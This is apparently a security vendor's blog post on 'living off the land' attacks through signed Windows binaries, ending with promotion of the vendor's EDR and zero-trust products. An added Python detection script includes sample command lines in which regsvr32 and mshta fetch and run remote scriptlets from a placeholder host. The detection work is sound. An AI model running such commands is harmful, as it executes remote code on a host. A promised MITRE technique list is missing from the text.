Living Off the Land: Surviving the Digital Wilderness

Brent Murphy
Aaron Goldstein
August 10, 2023

In recent years, cyber attackers have employed tactics that involve "living off the land" (LOL) within the environments they target. Essentially, malicious actors leverage existing tools within operating systems, hardware, APIs, and SaaS products to make it significantly harder to detect intrusions, data exfiltration, and lateral movement through networks and systems. In this blog, we delve into how attackers utilize legitimate software to bypass security protections and remain undetected.

Learning the landscape

Living Off the Land Binaries and Scripts (LOLBAS) constitutes a family of techniques that abuse signed binaries (LOLBins), scripts, and drivers (LOLDrivers) to execute actions on a device. These actions depend on the abused tool having a trust relationship with the operating system. While the various LOLBAS techniques use a broad range of procedures to achieve their intended actions, they share similar functions and objectives. They typically execute without leaving files on disk, but can invoke scripts from remote servers to establish persistence via backdoors or Remote Access Trojans (RATs) and to retrieve host and network information, including privileged data such as credentials.

Once inside a system, LOL attacks use these locally present binaries and drivers to:

  • Execute code
  • Compile code
  • Establish persistence
  • Bypass user account control
  • Perform credential theft
  • Dump process memory
  • Perform surveillance
  • Modify and/or clear logs
  • Side-load malicious DLLs

This creates an ideal environment for an attacker to progress through the network or introduce malware to the environment while bypassing detection, with potentially dire consequences.

Understanding techniques

LOL techniques encompass the misuse of interpreters such as the Windows Command Shell and PowerShell, infrastructure such as Windows Management Instrumentation (WMI), and device, system, and application drivers. These fileless attacks target Microsoft-signed software files that are crucial to normal operation. Because the operating system trusts these interpreters, attackers use them to download external Command and Control (C2) scripts, retrieve local system information, and query internal network systems for privileged user information. By turning the trust relationship of these signed files against the native OS, attackers persist and operate on the host and within the network while remaining invisible to both endpoint and network detection.

The Windows binaries exploited by attackers serve essential functions in systems, encompassing host management and network communication. As vital components of business operations, these utilities include:

  • rundll32[.]exe - Loads and runs DLLs. Exploited by attackers to execute malicious DLLs.
  • regsvr32[.]exe - Registers and unregisters Object Linking and Embedding (OLE) controls on Windows systems. Exploited to run arbitrary code by calling malicious scripts from remote servers and executing them on the host.
  • mshta[.]exe - Executes Microsoft HTML Application (HTA) files. Often distributed via malicious emails, these files are parsed in browsers and can execute malicious VBScript, bypassing application allowlisting.

Using MITRE ATT&CK to track the functions of these LOL attacks lets us gather preliminary intelligence on the nature of an attack, enabling us to plan and respond effectively. The following are the most common MITRE-assigned techniques from the LOLBAS Project list of known LOL attacks, sorted in descending order of frequency, with the number of occurrences in the list:

Using these techniques, threat actors can extract and manipulate data from their environment using tools that already exist on networks/hosts in ways unintended by developers. Regardless of whether the attack originates from an interpreter or a driver, they all share a common purpose.

Defending against living off the land techniques

LOL attacks leveraging preexisting critical OS utilities pose challenges for detection and defense. Nonetheless, several methods can be employed to guard against these attacks. An effective Endpoint Detection and Response (EDR) solution monitors and inspects hosts for potentially malicious process invocation resulting from LOLBAS execution. Early detection and prevention are crucial, as they can impede attackers' network movement and rapid malware propagation. Despite their effectiveness, host-level protections like EDR could become a single point of failure if the network relies on assumed trust relationships among devices. These relationships are often targeted by advanced adversaries for lateral movement or malware spreading.
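As an added illustration of the kind of process-invocation monitoring described above (this is example code, not Todyl's product logic), the following script applies simple heuristics to process-creation records for the three binaries listed earlier. The record format ("image | command line | parent image") and the sample events are constructed for the example; the URLs are placeholders.

```python
# Added example (not Todyl's code): heuristic review of Windows process-creation
# records for suspicious use of rundll32, regsvr32 and mshta.
# The "image | command line | parent" format and all events are constructed.
import re
from dataclasses import dataclass

# Constructed sample telemetry; example.invalid is a reserved placeholder domain.
SAMPLE_EVENTS = [
    r"C:\Windows\System32\rundll32.exe | rundll32.exe shell32.dll,Control_RunDLL | C:\Windows\explorer.exe",
    r"C:\Windows\System32\rundll32.exe | rundll32.exe C:\Users\bob\AppData\Local\Temp\upd.dll,Run | C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
    r"C:\Windows\System32\regsvr32.exe | regsvr32.exe /i:http://example.invalid/x.sct scrobj.dll | C:\Windows\System32\cmd.exe",
    r"C:\Windows\System32\mshta.exe | mshta.exe http://example.invalid/page.hta | C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
    r"C:\Windows\System32\regsvr32.exe | regsvr32.exe /s C:\Program Files\Vendor\ctl.ocx | C:\Windows\System32\msiexec.exe",
]

LOLBINS = {"rundll32.exe", "regsvr32.exe", "mshta.exe"}
USER_WRITABLE = re.compile(r"\\(Users|ProgramData|Windows\\Temp)\\", re.I)
OFFICE_PARENTS = re.compile(r"\\(WINWORD|EXCEL|OUTLOOK|POWERPNT)\.EXE$", re.I)

@dataclass
class Finding:
    image: str
    reasons: list

def analyze(event: str):
    """Return a Finding for a suspicious LOLBin invocation, else None."""
    image, cmdline, parent = (p.strip() for p in event.split("|"))
    name = image.rsplit("\\", 1)[-1].lower()
    if name not in LOLBINS:
        return None
    reasons = []
    if re.search(r"\b(https?|ftp)://", cmdline, re.I):
        reasons.append("remote URL passed to a signed binary")
    if re.search(r"\b(javascript|vbscript):", cmdline, re.I):
        reasons.append("inline script protocol handler")
    if name == "regsvr32.exe" and re.search(r"/i:|scrobj\.dll", cmdline, re.I):
        reasons.append("scriptlet registration via regsvr32")
    if name == "rundll32.exe" and USER_WRITABLE.search(cmdline):
        reasons.append("DLL loaded from a user-writable path")
    if OFFICE_PARENTS.search(parent):
        reasons.append("spawned by an Office application")
    return Finding(name, reasons) if reasons else None

def scan(events):
    """Apply analyze() to every record and keep only the findings."""
    return [f for f in (analyze(e) for e in events) if f]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f.image, "->", "; ".join(f.reasons))
```

Benign uses of the same binaries (a Control Panel applet via rundll32, a vendor OCX registered by an installer) produce no finding, which is the point: the binary name alone is not a signal, the context of its invocation is.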

In contrast to many EDR platforms, Todyl's comprehensive approach addresses threats posed by fileless attacks while eliminating that single point of failure. Todyl's Endpoint Security solution employs proactive measures to terminate malicious processes resulting from in-memory attacks before they execute on the host. This incorporates Memory Threat Protection, which performs real-time analysis of command execution to identify indicators of fileless attacks like LOLBAS. It analyzes the context of in-memory command execution to terminate malicious processes, preventing dynamic threats inherent in fileless attacks, often missed by many EDR platforms. Further details on Todyl's process detection and handling can be found here.

While Memory Threat Protection mitigates fileless attack threats, Todyl's SASE platform addresses another critical factor contingent on the success of fileless attacks: trust relationships. Our SASE platform was conceived on the principle of least privilege, anticipating adversarial tactics. Guided by "Never Trust, Always Verify," we manage trust relationships between applications, network-enabled devices, and users. Todyl's Zero Trust Network Access (ZTNA) capabilities via SASE prevent access from unverified devices and offer granular access control at scale. Alternatively, Todyl's LAN Zero Trust provides network segmentation and conditional access to sensitive physical network resources. Zero Trust implementation thwarts LOLBAS attacks by impeding intrusion, limiting lateral movement and malware propagation through network segmentation, and minimizing data leakage risks by providing controlled access to specific resources.

Though LOL attacks are on the rise, organizations can employ Todyl to safeguard themselves and their clients from exploitation. Learn more about Todyl's EDR capabilities in preventing LOL and other common attacks like ransomware by reading our eBook.
